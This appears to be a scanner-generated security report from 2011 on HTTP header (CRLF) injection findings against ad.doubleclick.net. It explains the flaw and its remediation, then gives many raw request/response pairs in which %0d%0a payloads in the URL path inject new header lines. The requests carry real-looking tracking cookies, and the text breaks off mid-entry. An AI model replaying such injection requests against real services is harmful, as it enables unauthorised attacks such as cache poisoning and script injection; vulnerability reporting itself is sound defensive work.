HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the cr request parameter is copied into the Location response header. The payload 62d6c%0d%0a28a2bbf9b55 was submitted in the cr parameter. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 5680c%0d%0ad2c6a305f31 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5680c%0d%0ad2c6a305f31/N1558.advertising.com/B3897970.13 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5680c
d2c6a305f31/N1558.advertising.com/B3897970.13:
Date: Sun, 20 Mar 2011 14:02:54 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 517d7%0d%0abe153345509 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /517d7%0d%0abe153345509/N3340.247realmedia.com/B5245409.18 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/517d7
be153345509/N3340.247realmedia.com/B5245409.18:
Date: Sun, 20 Mar 2011 14:02:49 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 3c518%0d%0a7d2282ed865 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3c518%0d%0a7d2282ed865/N3340.247realmedia.com/B5245409.19 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3c518
7d2282ed865/N3340.247realmedia.com/B5245409.19:
Date: Sun, 20 Mar 2011 14:02:52 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 26b0e%0d%0af869cd452cc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /26b0e%0d%0af869cd452cc/N4518.247RealMedia/B4955444.24 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/26b0e
f869cd452cc/N4518.247RealMedia/B4955444.24:
Date: Sun, 20 Mar 2011 14:02:54 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 3c58d%0d%0a628d11db449 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3c58d%0d%0a628d11db449/N553.mediamath/B5123370.34 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3c58d
628d11db449/N553.mediamath/B5123370.34:
Date: Sun, 20 Mar 2011 14:02:49 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 3bcb6%0d%0acf011614d08 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3bcb6%0d%0acf011614d08/N553.mediamath/B5123370.3945 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3bcb6
cf011614d08/N553.mediamath/B5123370.3945:
Date: Sun, 20 Mar 2011 14:02:49 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 29fe3%0d%0a2e37f006d1b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /29fe3%0d%0a2e37f006d1b/N553.mediamath/B5123370.4 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/29fe3
2e37f006d1b/N553.mediamath/B5123370.4:
Date: Sun, 20 Mar 2011 14:02:49 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 21a2e%0d%0aa0d1ad4b93 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /21a2e%0d%0aa0d1ad4b93/N5823.RealMedia/B5318341.2 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/21a2e
a0d1ad4b93/N5823.RealMedia/B5318341.2:
Date: Sun, 20 Mar 2011 14:02:54 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 391e6%0d%0a6b197e23966 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /391e6%0d%0a6b197e23966/N5823.RealMedia/B5318341.3 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/391e6
6b197e23966/N5823.RealMedia/B5318341.3:
Date: Sun, 20 Mar 2011 14:02:54 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 48649%0d%0a56c26ca962e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /48649%0d%0a56c26ca962e/N5853.3630.1790008898421/B5154579.5 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/48649
56c26ca962e/N5853.3630.1790008898421/B5154579.5:
Date: Sun, 20 Mar 2011 14:02:54 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 1fe20%0d%0ab3f9ca0144b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1fe20%0d%0ab3f9ca0144b/oiq.rmx/;otp=11042;tile=1;sz=728x90;ord=123456789? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?qkaAABt0GAD5lIQAAAAAAMnCIQAAAAAAAAAMAAYAAAAAAAcAAgABCXmeHQAAAAAAhIAMAAAAAACRUiwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAR7bz.dR4wT.2KFyPwvXYP-N6FK5H4co.MzMzMzMz4z9nZmZmZmbWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACydZlOreLOCUCegxsWkKNBD3qTKv.sqDdpKJcgAAAAAA==,,http%3A%2F%2Fwww.therugged.com%2Ffeatured%2Fart-of-surviving-the-pub-crawl-how-to-keep-your-job-relationship-life-and-reputation-intact-on-st-paddy%25e2%2580%2599s-day%2F,Z%3D728x90%26s%3D1602587%26_salt%3D1054132058%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.therugged.com%252Ffeatured%252Fart-of-surviving-the-pub-crawl-how-to-keep-your-job-relationship-life-and-reputation-intact-on-st-paddy%2525e2%252580%252599s-day%252F%26r%3D0,446934ae-52f4-11e0-a330-003048d6d630
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1fe20
b3f9ca0144b/oiq.rmx/;otp=11042;tile=1;sz=728x90;ord=123456789:
Date: Sun, 20 Mar 2011 13:32:28 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 259b5%0d%0a64574fded8a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /259b5%0d%0a64574fded8a/N1558.advertising.com/B3897970.13;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000787694/mnum=0000759958/cstr=16369623=_4d85fc08,4560463311,787694%5E759958%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=16369623/optn=64?trg=;ord=4560463311? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856445/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=0000133c0000000000000000/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
The value of REST URL parameter 1 is copied into the Location response header. The payload 6f74a%0d%0a7f9a02edf99 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /6f74a%0d%0a7f9a02edf99/N2524.134426.0710433834321/B4169763.44;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BiQfiHAGGTfi-G8_zlAf68cThD5Wpie8BrYeJ8hLjqLazM_CL0wQQARgBIM-2sAM4AGDJBqABo67u9gOyAQx3d3cud29vdC5jb226AQozMDB4MjUwX2FzyAEJ2gEjaHR0cDovL3d3dy53b290LmNvbS9XaGF0SXNXb290LmFzcHi4AhjAAgXIAuXvxRjgAgDqAhJ3b290LWJsb2cxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA-0C6AOTBOgDqQb1AwQEAMTgBAE&num=1&sig=AGiWqtwPCfylAn4LjFnmamHhqeEpZGvhnw&client=ca-pub-2332856072838068&adurl=;ord=2113777662? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
The value of REST URL parameter 1 is copied into the Location response header. The payload 81349%0d%0a4d98cc89398 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /81349%0d%0a4d98cc89398/N4518.247RealMedia/B4955444.24;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msngames/ros/728x90/jx/ss/a/L27/2030005299/Top1/USNetwork/BCN2011030297_004_Trion/20144021.html/726348573830316934646f4141767949?;ord=2030005299? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856445/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=0000133c0000000000000000/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
The value of REST URL parameter 1 is copied into the Location response header. The payload 78fec%0d%0a2b886149a26 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /78fec%0d%0a2b886149a26/N5552.152304.TRADINGDESK/B5035357.75;sz=300x250;ord=4368258591177512398?;click=http://r.turn.com/r/tpclick/id/zhUvbgssnzxWTgUAeAABAA/3c/http%3A%2F%2Ftrack1000.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%3FclickData%3DRGcAAEVnAAACVQAA6AEAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAACwBAAD6AAAAAAAAAAIAAAA0M0E4QUJGQS03NDk3LTQ3MUEtOUFGNi0yOTc0RDE3RUYzMzUAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA%3D%3D_url%3D/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.woot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/78fec
2b886149a26/N5552.152304.TRADINGDESK/B5035357.75;sz=300x250;ord=4368258591177512398:
Date: Sun, 20 Mar 2011 12:46:47 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 5240a%0d%0a5ca3438309 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5240a%0d%0a5ca3438309/sw.nol/atf_i_s/_hp;sec0=_hp;!category=_hp;!category=pop;pos=atf;tag=adi;mtype=standard;sz=728x90;tile=1;dcopt=ist;u=!category-_hp%7C!category-pop%7Cpos-atf%7Ctag-adi%7Cmtype-standard%7Csz-728x90%7Ctile-1%7Cdcopt-ist;ord=396664395998232060? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.shockwave.com/home.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5240a
5ca3438309/sw.nol/atf_i_s/_hp;sec0=_hp;!category=_hp;!category=pop;pos=atf;tag=adi;mtype=standard;sz=728x90;tile=1;dcopt=ist;u=!category-_hp|!category-pop|pos-atf|tag-adi|mtype-standard|sz-728x90|tile-1|dcopt-ist;ord=396664395998232060:
Date: Sun, 20 Mar 2011 12:36:31 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 5ed3d%0d%0a09c2515ade6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5ed3d%0d%0a09c2515ade6/N1558.advertising.com/B3897970.13 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5ed3d
09c2515ade6/N1558.advertising.com/B3897970.13:
Date: Sun, 20 Mar 2011 14:02:45 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 5e23e%0d%0abf461379124 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5e23e%0d%0abf461379124/N2524.134426.0710433834321/B4169763.44 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5e23e
bf461379124/N2524.134426.0710433834321/B4169763.44:
Date: Sun, 20 Mar 2011 14:02:46 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 4f673%0d%0a16eecbefeef was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /4f673%0d%0a16eecbefeef/N2524.134426.0710433834321/B4169763.45 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4f673
16eecbefeef/N2524.134426.0710433834321/B4169763.45:
Date: Sun, 20 Mar 2011 14:02:45 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 3871f%0d%0a88fc0961afc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3871f%0d%0a88fc0961afc/N3175.272756.AOL-ADVERTISING2/B4640114.3 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3871f
88fc0961afc/N3175.272756.AOL-ADVERTISING2/B4640114.3:
Date: Sun, 20 Mar 2011 14:02:45 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 2cf7a%0d%0a1b8fd4f06f3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2cf7a%0d%0a1b8fd4f06f3/N3340.247realmedia.com/B4872659.91 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2cf7a
1b8fd4f06f3/N3340.247realmedia.com/B4872659.91:
Date: Sun, 20 Mar 2011 14:02:44 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 6e309%0d%0ae9f2da89aff was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /6e309%0d%0ae9f2da89aff/N3340.247realmedia.com/B5245409.18;sz=300x250;pc=[TPAS_ID];click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msngames/ros/300x250/jx/ss/a/L28/1000160035/x15/USNetwork/BCN2011020355_006_Nissan/Nissan2.17_300.html/726348573830316934646f4141767949?;ord=1000160035? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856443/direct;wi.300;hi.250/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014700000000000000000/height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
The value of REST URL parameter 1 is copied into the Location response header. The payload 3e030%0d%0a25c3eca06c7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3e030%0d%0a25c3eca06c7/N3340.247realmedia.com/B5245409.19;sz=728x90;pc=[TPAS_ID];click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msngames/ros/728x90/jx/ss/a/L27/813909198/Top1/USNetwork/BCN2011020355_006_Nissan/Nissan2.17_728.html/726348573830316934646f4141767949?;ord=813909198? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856445/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=0000133c0000000000000000/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
The value of REST URL parameter 1 is copied into the Location response header. The payload 7a2ff%0d%0a9d4a8ed3156 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
